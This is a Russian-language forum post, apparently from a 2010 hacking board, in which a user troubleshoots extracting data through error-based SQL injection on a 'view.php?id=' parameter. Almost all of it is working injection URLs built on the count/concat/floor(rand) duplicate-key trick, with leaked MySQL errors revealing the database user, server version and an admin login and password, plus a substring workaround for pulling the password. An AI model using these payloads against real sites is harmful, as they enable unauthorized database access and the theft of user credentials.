27.04.2010, 16:27
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами:
9567396
Репутация:
23
|
|
Тема с выводом инфы через ошибки такая забавная.
Раз:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,user(),version())+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
PHP код:
Error 1062: Duplicate entry 'user@siteserv:5.1.29-rc-log1' for key 'group_key'
Два:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,user,password)+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
//WTF? Поле password точно есть.
Три:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+user+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
PHP код:
Error 1062: Duplicate entry 'admin1' for key 'group_key'
Четыре:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+password+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
//WTF
Пять:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+password+from+users+WHERE+user='admin'),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
//WTF
Шесть:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+substring(password,1,5)+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
PHP код:
Error 1062: Duplicate entry 'mypas1' for key 'group_key'
В итоге работает такой костыль:
PHP код:
view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(user,substring(password,1,300))+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)
PHP код:
Error 1062: Duplicate entry 'admin:mypassword1' for key 'group_key'
И таки откуда такая проблема и как ее обойти? Substring - не выход, я считаю. |
|
|